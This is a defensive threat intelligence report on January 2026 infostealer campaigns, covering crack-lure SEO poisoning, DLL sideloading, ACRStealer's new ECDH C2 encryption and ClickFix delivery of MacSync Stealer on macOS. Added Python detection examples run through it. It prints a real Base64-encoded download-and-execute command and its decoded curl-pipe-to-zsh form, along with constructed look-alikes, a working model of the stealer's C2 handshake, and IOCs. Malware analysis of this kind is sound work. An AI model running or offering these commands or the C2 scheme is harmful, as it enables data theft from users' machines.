January 2026 Infostealer Trend Report

This report presents statistics, trends, and case information on the distribution volume, distribution methods, and obfuscation techniques of Infostealer malware collected and analyzed during January 2026. Below is a summary of the original report.

 

1) Data Sources and Collection Methods
 

AhnLab Security Intelligence Center (ASEC) operates several systems that automatically collect malware currently in distribution in order to respond proactively to Infostealer malware. The collected samples are examined for malicious behavior and C2 information by an automated analysis system. The resulting information is provided in real time through the ATIP IOC service and can also be viewed on the Related Information page of ATIP's file analysis information.

 

 

  • AhnLab’s self-built systems
    – Crack Concealment Malware Automatic Collection System
    – Email Honeypot System
    – Malware C2 Automated Analysis System
  • ATIP Real-time IOC Service
    – C2 and Malware Type Analysis Information
  • ATIP File Analysis Information – Related Information – Contacted URLs

 

The statistics in this report are intended for tracking trends in the overall distribution volume of Infostealer malware, its camouflage techniques, and its distribution methods.

2) Infostealers Distributed Under the Guise of Cracks

 

These statistics cover information-stealing malware disguised as illegal programs such as cracks and keygens. It is distributed through SEO poisoning, a strategy that makes the malware distribution posts appear prominently in search engine results. AhnLab Security Intelligence Center (ASEC) has built a system that automatically collects malware distributed in this way and analyzes its C2 information, enabling real-time blocking of the malware C2 servers, and provides the related information through ATIP. In January, LummaC2, Vidar, and ACRStealer were the Infostealers primarily distributed.
 

Figure 1. Malware Distribution Page

The chart below shows the quantity of malware distributed in this way over the past year. The second legend entry indicates the number of samples that had no information on VirusTotal at the time of collection, meaning that AhnLab collected them before they appeared there. The majority of the malware was first collected and handled by the automated collection system.
 

Chart 1. Annual Malware Distribution Quantity

Previously, attackers wrote the distribution posts on blogs they created themselves, but search engines have begun taking measures to keep such malicious blogs out of search results. To bypass this, attackers now distribute malware by writing posts on legitimate sites: popular forums, the Q&A pages of specific companies, bulletin boards, comment sections, and so on. The figures below show examples of distribution posts uploaded to various sites. Because posts uploaded in this manner appear at the top of search engine results, many users end up visiting them. Recently, there has been an increase in cases where attackers target poorly managed WordPress sites to create distribution posts.

 

Figure 2. Distribution Posts on Community Sites

Figure 3. Distribution Posts on Corporate Websites
 

The Infostealers distributed in this way come in two execution types: those distributed as an EXE, and those that use the DLL sideloading technique, where a legitimate EXE and a malicious DLL are placed in the same folder so that the malicious DLL is loaded when the legitimate EXE is executed. In January, approximately 70.8% of the samples were of the EXE type and approximately 29.2% of the DLL sideloading type, a slight decrease in the DLL sideloading share compared to the previous month. A DLL sideloading sample is created by modifying only a portion of the original legitimate DLL to insert malicious code, so it differs little in appearance from the original; other security products frequently classify it as a normal file, so caution is required.
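The "looks like the original" problem described above is exactly what a whole-file hash or a glance at the version resource cannot resolve, while hashing each PE section separately against the vendor's original DLL does. The following Python triage helper is an added example (not ASEC's tooling and not code from the report): it parses the PE section table with the standard library, hashes every section, and reports which sections differ from a known-good copy of the same DLL. The two DLL images it compares are constructed inside the script (a minimal synthetic PE built by `build_pe`, not a real vendor DLL), so it runs offline; on a real case you would pass the bytes of the suspect DLL and of a clean copy obtained from the vendor.

```python
import hashlib
import struct

SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def _align(n, a):
    return (n + a - 1) & ~(a - 1)


def pe_sections(data):
    """Return [(name, raw_bytes)] for every section of a PE image (no third-party parser)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ executable")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    # COFF header follows the signature: NumberOfSections at +2, SizeOfOptionalHeader at +16
    nsec = struct.unpack_from("<H", data, pe_off + 6)[0]
    opt_size = struct.unpack_from("<H", data, pe_off + 20)[0]
    table = pe_off + 24 + opt_size
    sections = []
    for i in range(nsec):
        name, _vsize, _va, raw_size, raw_ptr = struct.unpack_from("<8sIIII", data, table + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"),
                         data[raw_ptr:raw_ptr + raw_size]))
    return sections


def section_hashes(data):
    return {name: hashlib.sha256(raw).hexdigest() for name, raw in pe_sections(data)}


def changed_sections(baseline, sample):
    """Compare a suspect DLL with a known-good copy: {section: 'modified'|'added'|'removed'}."""
    b, s = section_hashes(baseline), section_hashes(sample)
    report = {}
    for name in sorted(set(b) | set(s)):
        if name not in s:
            report[name] = "removed"
        elif name not in b:
            report[name] = "added"
        elif b[name] != s[name]:
            report[name] = "modified"
    return report


def build_pe(sections):
    """Build a minimal PE32+ image from {section_name: bytes}. Constructed test fixture only."""
    names = list(sections)
    opt_size = 0xE0
    headers_len = 64 + 4 + 20 + opt_size + 40 * len(names)
    raw_ptr = _align(headers_len, 0x200)
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 64)                       # e_lfanew = 64
    coff = struct.pack("<HHIIIHH", 0x8664, len(names), 0, 0, 0, opt_size, 0x2022)  # x64, DLL image
    opt = struct.pack("<H", 0x20B) + b"\0" * (opt_size - 2)                # PE32+ magic, rest zeroed
    table, body, va = b"", b"", 0x1000
    for name in names:
        raw = sections[name]
        raw_size = _align(len(raw), 0x200)
        table += struct.pack(SECTION_HDR, name.encode(), len(raw), va, raw_size, raw_ptr,
                             0, 0, 0, 0, 0x60000020)
        body += raw.ljust(raw_size, b"\0")
        raw_ptr += raw_size
        va += _align(len(raw), 0x1000)
    headers = (dos + b"PE\0\0" + coff + opt + table).ljust(_align(headers_len, 0x200), b"\0")
    return headers + body


# Constructed fixtures: a "vendor" DLL and a copy in which only .text has been patched.
_RESOURCES = b"VS_VERSION_INFO FileDescription=Vendor Helper CompanyName=Vendor"
LEGIT_DLL = build_pe({".text": b"\x48\x83\xec\x28" * 64,
                      ".rdata": b"vendor strings", ".rsrc": _RESOURCES})
TROJAN_DLL = build_pe({".text": b"\x48\x83\xec\x28" * 60 + b"\xe8\x00\x00\x00\x00" * 3 + b"\x90",
                       ".rdata": b"vendor strings", ".rsrc": _RESOURCES})

if __name__ == "__main__":
    print("whole-file md5 differs:",
          hashlib.md5(LEGIT_DLL).hexdigest() != hashlib.md5(TROJAN_DLL).hexdigest())
    print("section diff:", changed_sections(LEGIT_DLL, TROJAN_DLL))   # {'.text': 'modified'}
```

The `.rsrc` section (where the version information that a Properties dialog shows lives) hashes identically in both images; only `.text` changes, which is the pattern the report describes. On a live Windows host the quickest companion check is the Authenticode signature: a patched copy of a signed vendor DLL fails `Get-AuthenticodeSignature`, even though its version resource still names the vendor.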

 

The Infostealers above are distributed in a Windows environment; when the distribution page is accessed from macOS, macOS Infostealers are distributed instead. For macOS, the ClickFix technique is mainly used: the user is induced to copy a malicious command and execute it in the terminal, or is prompted to download and run a malicious Bash script, which then delivers the Infostealer. The Infostealer that is ultimately executed is mostly distributed either as a Fatbin (fat/universal binary) executable or as an implementation in osascript. Unlike the Windows distribution, these samples mutate very rapidly: the functionality stays the same, but the hash values of the malware change every few minutes or hours.
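Because the hash of these macOS samples rotates by the minute, a hash-based blocklist lags behind the campaign. A normalized fingerprint that masks the volatile parts (C2 URL and path token, hex identifiers, Base64 blobs, numbers, comments, whitespace) before hashing stays stable across the rotation. The Python below is an added example and not ASEC's code; the downloader scripts it compares are constructed for the example (the `.invalid` host is a placeholder), and two of them differ only in the parts that rotate.

```python
import hashlib
import re

URL = re.compile(r"https?://[^\s'\"|;&]+")
COMMENT = re.compile(r"(^|\s)#.*$")          # shell comments: a cheap place to inject per-sample junk
# Masked after URLs and comments; order matters so a hex token is not later treated as Base64.
TOKENS = [
    (re.compile(r"\b[0-9a-fA-F]{16,}\b"), "<HEX>"),
    (re.compile(r"[A-Za-z0-9+/]{40,}={0,2}"), "<B64>"),
    (re.compile(r"\b\d+\b"), "<N>"),
]


def normalize(script):
    """Collapse a shell/osascript downloader to its stable skeleton."""
    out = []
    for line in script.splitlines():
        line = URL.sub("<URL>", line)           # before comment stripping, so '#' in URLs is safe
        line = COMMENT.sub("", line)
        for pattern, token in TOKENS:
            line = pattern.sub(token, line)
        line = " ".join(line.split())           # whitespace padding is another rotation trick
        if line:
            out.append(line)
    return "\n".join(out)


def fingerprint(script):
    """SHA-256 over the normalized script; survives URL/token/comment rotation."""
    return hashlib.sha256(normalize(script).encode()).hexdigest()


def raw_hash(script):
    """Plain MD5 of the file, i.e. the value that changes with every rotation."""
    return hashlib.md5(script.encode()).hexdigest()


def cluster(samples):
    """{sample_name: text} -> {fingerprint: [names]}: group rotated variants of one downloader."""
    groups = {}
    for name, text in samples.items():
        groups.setdefault(fingerprint(text), []).append(name)
    return groups


# Constructed samples: A and B are two rotations of one downloader; OTHER is a different family.
SAMPLE_A = """#!/bin/zsh
# build 1737000000
echo 'Installing packages please wait...'
curl -kfsSL http://stage.invalid/curl/0ba44d64963765fb64db6a8f2f80deeb8735b24ab988eff22668a38be81eb4be | zsh
"""
SAMPLE_B = """#!/bin/zsh
#   build 1737000060  -- rotated
echo  'Installing packages please wait...'
curl -kfsSL http://stage.invalid/curl/9f1c2aa3bb5d7e8f0011223344556677889900aabbccddeeff00112233445566 | zsh
"""
SAMPLE_OTHER = """#!/bin/zsh
curl -fsSL http://stage.invalid/dl/7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e7e -o /tmp/x.scpt && osascript /tmp/x.scpt
"""

if __name__ == "__main__":
    print("md5 A == md5 B:", raw_hash(SAMPLE_A) == raw_hash(SAMPLE_B))          # False
    print("fp  A == fp  B:", fingerprint(SAMPLE_A) == fingerprint(SAMPLE_B))    # True
    print(cluster({"a": SAMPLE_A, "b": SAMPLE_B, "c": SAMPLE_OTHER}))
```

The same normalizer applies to the osascript variants, since AppleScript source is text with the same kinds of rotating literals; compiled Fatbin samples need a structural hash (for example over code sections, as in the PE example earlier) rather than text normalization.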

 

Figure 4. Example of a macOS Infostealer distribution page

 

The collection status of macOS Infostealers over the past 6 months is shown in the chart below. In January, 268 Bash scripts, 12 Fatbin executables, and 27 C2 domains were collected.

 

Chart 2. macOS Infostealer Collection Statistics

 

Trends #1

– Occurrence of ACRStealer variants

At the end of January, a significant change was made to the C2 communication of ACRStealer. Previously, C2 traffic was encrypted with AES using a key hardcoded in the malware; since the end of January, the distributed samples use ECDH and ChaCha20-Poly1305 instead. To support this, a public key exchange between the two parties was added to the C2 connection process.

 

When the malware runs, it generates a key pair on the SECP256R1 curve and sends the public key to the C2 server, which responds with its own public key. The malware then combines the C2 server's public key with its own private key to derive a shared secret, which is used as the encryption key. All subsequent communication with the C2 server is encrypted with this key using ChaCha20-Poly1305.

 

The malware uses PEB data as the seed for key pair generation, so a different key pair is produced on every execution, even in the same environment. The C2 server therefore has to identify the execution session precisely in order to decrypt the data, and it appears that the “X-Requests-Key” header was added for this purpose. Its value is issued by the C2 server during the key exchange, and the malware includes the header in every subsequent connection to the C2 server.
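The exchange described above, written out as an added example with both sides of the protocol. This is a model built from the description, not ACRStealer's code and not the real C2 protocol; it uses the `cryptography` package (`pip install cryptography`) for SECP256R1 ECDH and ChaCha20-Poly1305. Assumptions beyond what the report states: the raw 32-byte ECDH shared secret is used directly as the ChaCha20-Poly1305 key, each message carries a random 12-byte nonce in front of the ciphertext, public keys travel as uncompressed X9.62 points, and the `X-Requests-Key` value is a random token chosen by the server. The client key pair comes from the OS RNG rather than from PEB data.

```python
import os
import secrets

from cryptography.exceptions import InvalidTag
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import ec
from cryptography.hazmat.primitives.ciphers.aead import ChaCha20Poly1305

HEADER = "X-Requests-Key"   # session selector issued by the C2 during the key exchange
CURVE = ec.SECP256R1()


def pub_bytes(private_key):
    """Serialize the public key as an uncompressed X9.62 point (assumed wire encoding)."""
    return private_key.public_key().public_bytes(
        serialization.Encoding.X962, serialization.PublicFormat.UncompressedPoint)


def load_pub(raw):
    return ec.EllipticCurvePublicKey.from_encoded_point(CURVE, raw)


def seal(aead, plaintext):
    nonce = os.urandom(12)                    # assumed: fresh random nonce prefixed to each message
    return nonce + aead.encrypt(nonce, plaintext, None)


def unseal(aead, blob):
    return aead.decrypt(blob[:12], blob[12:], None)   # InvalidTag if the key (session) is wrong


class C2Server:
    """Server side: one ephemeral key pair and one AEAD per client session, keyed by the header."""

    def __init__(self):
        self.sessions = {}

    def key_exchange(self, client_pub_raw):
        priv = ec.generate_private_key(CURVE)
        secret = priv.exchange(ec.ECDH(), load_pub(client_pub_raw))   # 32-byte shared x-coordinate
        session_id = secrets.token_hex(16)
        self.sessions[session_id] = ChaCha20Poly1305(secret)             # raw secret used as the key
        return {HEADER: session_id}, pub_bytes(priv)

    def handle(self, headers, body):
        aead = self.sessions.get(headers.get(HEADER))
        if aead is None:
            raise PermissionError("unknown or missing " + HEADER)
        return seal(aead, b"ACK:" + unseal(aead, body))


class Client:
    """Client (malware) side: a fresh key pair per run, so no static key exists in the binary."""

    def __init__(self, server):
        self.server = server
        self.priv = ec.generate_private_key(CURVE)   # the sample seeds this from PEB data; OS RNG here
        headers, server_pub_raw = server.key_exchange(pub_bytes(self.priv))
        self.session_id = headers[HEADER]
        self.aead = ChaCha20Poly1305(self.priv.exchange(ec.ECDH(), load_pub(server_pub_raw)))

    def send(self, data):
        reply = self.server.handle({HEADER: self.session_id}, seal(self.aead, data))
        return unseal(self.aead, reply)


def demo():
    server = C2Server()
    a, b = Client(server), Client(server)
    results = {
        "roundtrip": a.send(b"stolen-data") == b"ACK:stolen-data",
        "distinct_sessions": a.session_id != b.session_id,
        "unknown_header_rejected": False,
        "cross_session_fails": False,
    }
    try:
        server.handle({HEADER: "not-issued"}, seal(a.aead, b"x"))
    except PermissionError:
        results["unknown_header_rejected"] = True
    try:
        unseal(b.aead, seal(a.aead, b"x"))       # b's key cannot open a's traffic
    except InvalidTag:
        results["cross_session_fails"] = True
    return results


if __name__ == "__main__":
    print(demo())
```

The defender's takeaway from the model: with an ephemeral key pair per execution there is no static key to pull out of the sample, so decrypting captured C2 traffic requires the session's private key (for example from a memory dump taken while the process was running). Blocking the C2 addresses listed below and matching the `X-Requests-Key` header at a TLS-inspecting proxy are unaffected by the change. The model, like the description in the report, includes no authentication of the exchanged public keys.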

 

Figure 5. C2 header generation code (left: original, right: variant)

 

  • Hash
    7a5c704e85df3dec08c9ab17857c4ac1
    3337c23f43616d2736653963de7f91f2

  • C2
    hxxps://146.103.102[.]11
    hxxps://94.103.95[.]97

 

Trends #2

– Infostealer Distribution on macOS

Starting with this report, the trend report also covers macOS Infostealers, and we introduce a case involving the distribution of MacSync Stealer. During distribution, the browser's User-Agent is checked, and if it indicates macOS, the user is redirected to a page that distributes the macOS Infostealer. The page is disguised as GitHub and is designed to get the user to copy the content of an input box and paste it into the terminal for execution.

 

Figure 6. macOS Infostealer Distribution Page

 

The malicious command works as follows: it downloads a legitimate DMG file as a decoy and runs a Base64-encoded command with zsh, which in turn downloads and executes an additional script file from the C2 server.

 

Original command:
echo "GitHub-AppInstaller: https://dl.github[.]com/drive-file-stream/GitHubApplicationSetup.dmg" && echo 'ZWNobyAnSW5zdGFsbGluZyBwYWNrYWdlcyBwbGVhc2Ugd2FpdC4uLicgJiYgY3VybCAta2ZzU0wgaHR0cDovL3Nlc3RyYWluaW5nLmNvbS9jdXJsLzBiYTQ0ZDY0OTYzNzY1ZmI2NGRiNmE4ZjJmODBkZWViODczNWIyNGFiOTg4ZWZmMjI2NjhhMzhiZTgxZWI0YmV8enNo'|base64 -D|zsh

Decoded command:
echo 'Installing packages please wait...' && curl -kfsSL http://sestraining[.]com/curl/0ba44d64963765fb64db6a8f2f80deeb8735b24ab988eff22668a38be81eb4be|zsh

The downloaded script consists of a command that Base64-decodes and gzip-decompresses embedded data and then executes it. The final script that is executed is shown below.

 

Figure 7. Macsync Stealer Downloader
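A safe way to handle a pasted ClickFix command or the script it fetches is to unwrap the stages statically rather than run them. The Python below is an added example (not from the report) that peels `echo '<base64>' | base64 -D | zsh` layers, including the gzip-wrapped form described for the downloaded script, and lists the URLs and risky constructs found at each layer. The commands it runs on are constructed for the example and point at `.invalid` hostnames; their shape mirrors the command shown above and the decode step of the downloaded script.

```python
import base64
import gzip
import re

# echo '<blob>' | base64 -D [| gunzip] | zsh   (quotes optional; -d, -D and --decode accepted)
STAGE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?"
    r"\s*\|\s*base64\s+(?:-[dD]|--decode)"
    r"(?P<gz>\s*\|\s*(?:gunzip|gzip\s+-d|zcat))?"
    r"\s*\|\s*(?:zsh|bash|sh)\b")
URL = re.compile(r"https?://[^\s'\"|;&]+")
INDICATORS = [
    (re.compile(r"\|\s*(?:zsh|bash|sh)\b"), "pipe-to-shell"),
    (re.compile(r"\bcurl\b[^|\n]*\s-[A-Za-z]*k"), "curl-tls-verify-disabled"),
    (re.compile(r"\bbase64\s+(?:-[dD]|--decode)"), "base64-stage"),
    (re.compile(r"\b(?:gunzip|gzip\s+-d|zcat)\b"), "gzip-stage"),
    (re.compile(r"\bosascript\b"), "osascript"),
]


def unwrap(command, max_depth=5):
    """Peel nested base64/gzip stages without executing anything: [stage0, stage1, ...]."""
    stages = [command]
    for _ in range(max_depth):
        m = STAGE.search(stages[-1])
        if not m:
            break
        blob = base64.b64decode(m.group(1))
        if m.group("gz"):
            blob = gzip.decompress(blob)
        stages.append(blob.decode("utf-8", "replace"))
    return stages


def extract_urls(stages):
    seen = []
    for text in stages:
        for url in URL.findall(text):
            if url not in seen:
                seen.append(url)
    return seen


def indicators(stages):
    tags = []
    for text in stages:
        for pattern, tag in INDICATORS:
            if pattern.search(text) and tag not in tags:
                tags.append(tag)
    return tags


def defang(url):
    return url.replace("http", "hxxp", 1).replace(".", "[.]")


def _b64(data):
    return base64.b64encode(data).decode()


# Constructed inputs (placeholders, not the real campaign's infrastructure).
STAGE_TWO = "curl -fsSL http://stage-two.invalid/api/payload -o /tmp/p.scpt && osascript /tmp/p.scpt"
INNER = ("echo 'Installing packages please wait...' && "
         "curl -kfsSL http://stage-one.invalid/curl/"
         "0ba44d64963765fb64db6a8f2f80deeb8735b24ab988eff22668a38be81eb4be|zsh")
PASTED = ('echo "GitHub-AppInstaller: https://lure.invalid/GitHubApplicationSetup.dmg" && '
          "echo '" + _b64(INNER.encode()) + "'|base64 -D|zsh")
DOWNLOADED = "echo '" + _b64(gzip.compress(STAGE_TWO.encode())) + "' | base64 -D | gunzip | zsh"

if __name__ == "__main__":
    for label, cmd in (("pasted", PASTED), ("downloaded", DOWNLOADED)):
        stages = unwrap(cmd)
        print(label, "stages:", len(stages), "indicators:", indicators(stages))
        for url in extract_urls(stages):
            print("  ", defang(url))
```

Each layer is decoded with `base64.b64decode` and `gzip.decompress` only; nothing is passed to a shell, so the unwrapper can be run on a collected command in an analysis VM without triggering the download. The URL at the innermost layer is the one to block and to pivot on.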

 

The script connects to the C2 server, downloads and executes an osascript file, and then sends the resulting file back to the C2 server. The osascript executed is MacSync Stealer, which collects sensitive information from the system and writes it to a compressed file at “/tmp/osalogging.zip”. The collected information is sent to the C2 server by the script that executed it. The C2 connection uses a token value and an api_key value; if these values are invalid, the C2 server will not serve the request.

 

  • C2 domain: sestraining[.]com
  • Hash
    73600d113646a95d2e459dd940c18e1e (script)
    74e17b926dc6cc5ab247aa0e059916c1 (decoded script)
    4aab18983ab8c00f3c619b75033ce548 (MacSync Stealer)

 

 

Statistics not covered in this summary, including statistics on the target companies used for malware production, original file name statistics, distribution statistics, product detection count statistics, and detailed information on Infostealers delivered via phishing emails, can be found in the original ATIP report.

 

※ Please refer to the attached file for more details.

MD5

01d120f0c69e3d3d46954bfab810ca5f
039d3ed581a75ae7f85a38aeec34bd52
03d1fcf73519768d598b4ba895b7e30d
05b9ff47314c60e6458af6e385c79234
07b6dc68f629a8cf24cd8a1dd53df8fc
FQDN

146[.]103[.]102[.]11
94[.]103[.]95[.]97
sestraining[.]com
www[.]corvix[.]life